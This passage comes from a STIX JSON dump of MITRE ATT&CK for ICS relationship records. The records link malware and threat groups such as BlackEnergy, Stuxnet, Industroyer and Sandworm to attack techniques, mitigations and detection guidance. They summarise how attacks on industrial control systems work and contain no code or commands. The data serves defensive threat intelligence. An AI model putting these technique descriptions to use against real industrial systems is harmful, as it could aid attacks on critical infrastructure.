"description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:35:32.480Z", + "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) targeted energy sector organizations in a wide reaching email spearphishing campaign. Adversaries utilized malicious Microsoft Word documents attachments. (Citation: Booz Allen Hamilton)\n", + "relationship_type": "uses", + "source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fd856176-396c-4121-9754-35e49bfa5758", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:41:55.062Z", + "description": "Monitor for newly constructed network connections to untrusted hosts that are used to send or receive data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5914a482-dbb7-429d-96f3-77f0588ac12d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.123Z", + "relationship_type": "mitigates", + "description": "Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.\n", + "source_ref": "course-of-action--d48b79b2-076d-483e-949c-0d38aa347499", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ab8e129c-5411-4784-9194-068fa915da23", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov", + "description": "Anton Cherepanov BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry Retrieved. 2019/10/29 ", + "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:54:49.878Z", + "description": "[KillDisk](https://attack.mitre.org/software/S0607) deletes application, security, setup, and system event logs from Windows systems. (Citation: Anton Cherepanov)", + "relationship_type": "uses", + "source_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--50a2b289-7bce-405d-8515-c2b5424cce5c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.090Z", + "relationship_type": "mitigates", + "description": "Information which is sensitive to the operation and architecture of the process environment may be encrypted to ensure confidentiality and restrict access to only those who need to know. (Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cd297a7b-4b02-407e-a798-e36fef4cf3a1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.072Z", + "relationship_type": "mitigates", + "description": "Implement network allowlists to minimize serial comm port access to only authorized hosts, such as comm servers and RTUs.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--5424e327-396f-4b07-94a3-408ffc915686", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos", + "description": "Dragos Allanite Retrieved. 2019/10/27 ", + "url": "https://dragos.com/resource/allanite/" + }, + { + "source_name": "ICS-CERT October 2017", + "description": "ICS-CERT 2017, October 21 Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2017/10/23 ", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-293A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:40:18.975Z", + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) has been identified to collect and distribute screenshots of ICS systems such as HMIs. (Citation: Dragos) (Citation: ICS-CERT October 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "target_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--51eb15a3-48af-470f-94c0-10f25b366d72", + "created": "2022-09-28T20:30:22.148Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos-Pipedream", + "description": "DRAGOS. (2022, April 13). Pipedream: Chernovite’s Emerging Malware Targeting Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_ChernoviteWP_v2b.pdf?hsLang=en" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.436Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can establish a remote HTTP connection to change the operating mode of Omron PLCs.(Citation: Dragos-Pipedream)(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b8edcf0a-ec53-4203-b3ad-2cc734a1f1dd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-10-14T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.226Z", + "relationship_type": "mitigates", + "description": "Update software on control network assets when possible. If feasible, use modern operating systems and software to reduce exposure to known vulnerabilities.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3dde2b07-7c30-4a18-a9df-f85db84f9b14", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.214Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--26d68f5d-6ee5-4d98-b175-943366ccc038", + "created": "2020-10-14T21:33:27.046Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos October 2018", + "description": "Dragos 2018, October 12 Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE Retrieved. 2019/10/14 ", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:54:09.871Z", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) uses the MS-SQL server xp_cmdshell command, and PowerShell to execute commands. (Citation: Dragos October 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--db52c1b6-4e48-4e8c-a34c-3ca21b26fe8a", + "created": "2022-09-30T15:34:29.316Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T15:34:29.316Z", + "description": "Monitor for anomalies related to discovery related ICS functions, including devices that have not previously used these functions or for functions being sent to many outstations. Note that some ICS protocols use broadcast or multicast functionality, which may produce false positives. Also monitor for hosts enumerating network connected resources using non-ICS enterprise protocols.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ce7c17b7-b60d-4ebd-9014-2c421a64d70a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.207Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--0c4aaf6c-4b72-401f-950b-6d65ceb1267a", + "created": "2022-09-27T15:49:26.908Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:49:26.908Z", + "description": "Monitor asset application logs for information that indicate task parameters have changed.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b9e82422-b072-494f-99c1-fcab07b90133", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.146Z", + "relationship_type": "mitigates", + "description": "Require signed binaries.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6be102a8-5d9c-494e-a8ce-7b0a1c86a863", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:40:22.279Z", + "description": "Monitor for contextual file data that may show signs of deletion or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cb38425c-646d-4bc8-bdea-e6cc630c3034", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:18:37.808Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) infects PLCs with different code depending on the characteristics of the target system. An infection sequence consists of code blocks and data blocks that will be downloaded to the PLC to alter its behavior. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--088580e9-ccea-426e-9411-c1de60de650d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.206Z", + "relationship_type": "mitigates", + "description": "Devices should authenticate all messages between master and outstation assets.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--5771ce27-7cc7-4144-8c11-c1a6d2ac3e2c", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:33:10.450Z", + "description": "Monitor for unexpected changes to project files, although if the malicious modification occurs in tandem with legitimate changes it will be difficult to isolate the unintended changes by analyzing only file systems modifications.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "target_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--25ddb2e0-b945-45d2-a8a9-6e6d5c4401d3", + "created": "2023-03-30T18:57:21.754Z", + "revoked": false, + "external_references": [ + { + "source_name": "Kevin Savage and Branko Spasojevic", + "description": "Kevin Savage and Branko Spasojevic W32.Flamer Retrieved. 2019/11/03 ", + "url": "https://web.archive.org/web/20190930124504/https://www.symantec.com/security-center/writeup/2012-052811-0308-99" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T18:57:21.754Z", + "description": "[Flame](https://attack.mitre.org/software/S0143) has built-in modules to gather information from compromised computers. (Citation: Kevin Savage and Branko Spasojevic)", + "relationship_type": "uses", + "source_ref": "malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--968830b7-ee80-4a6e-96a4-9fc70470e4a9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.112Z", + "relationship_type": "mitigates", + "description": "Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and public disclosure.\n", + "source_ref": "course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--f2e672bb-8c73-4066-94d8-7dfb9a8025a7", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "McAfee CHIPSEC Blog", + "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.", + "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/" + }, + { + "source_name": "MITRE Copernicus", + "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.", + "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about" + }, + { + "source_name": "Intel HackingTeam UEFI Rootkit", + "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.", + "url": "http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html" + }, + { + "source_name": "Github CHIPSEC", + "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.", + "url": "https://github.com/chipsec/chipsec" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:48:28.074Z", + "description": "Monitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5dfa5bad-8b0b-4884-bf01-04ea89e3ccf7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.235Z", + "relationship_type": "mitigates", + "description": "Consider using IP allowlisting along with user account management to ensure that data access is restricted not only to valid users but only from expected IP ranges to mitigate the use of stolen credentials to access data.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c8dd2735-bd04-4413-847d-316b77c6de19", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:23:14.457Z", + "description": "Network allowlists can be implemented through either host-based files or system host files to specify what external connections (e.g., IP address, MAC address, port, protocol) can be made from a device. Allowlist techniques that operate at the application layer (e.g., DNP3, Modbus, HTTP) are addressed in the [Filter Network Traffic](https://attack.mitre.org/mitigations/M0937) mitigation.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c785c026-4139-4c56-a6dd-cdd3ba75bab1", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:57:08.952Z", + "description": "In [Industroyer](https://attack.mitre.org/software/S0604) the first COM port from the configuration file is used for the actual communication and the two other COM ports are just opened to prevent other processes accessing them. Thus, the IEC 101 payload component is able to take over and maintain control of the RTU device. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--892c0bff-17b6-447b-a213-6a3189a1df82", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:51:45.844Z", + "description": "Monitor for newly executed processes that can aid in sniffing network traffic to capture information about an environment.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a717ccc7-0fe6-4a83-951f-5a89037ed927", + "created": "2023-03-30T14:08:06.442Z", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T14:08:06.442Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.", + "relationship_type": "mitigates", + "source_ref": 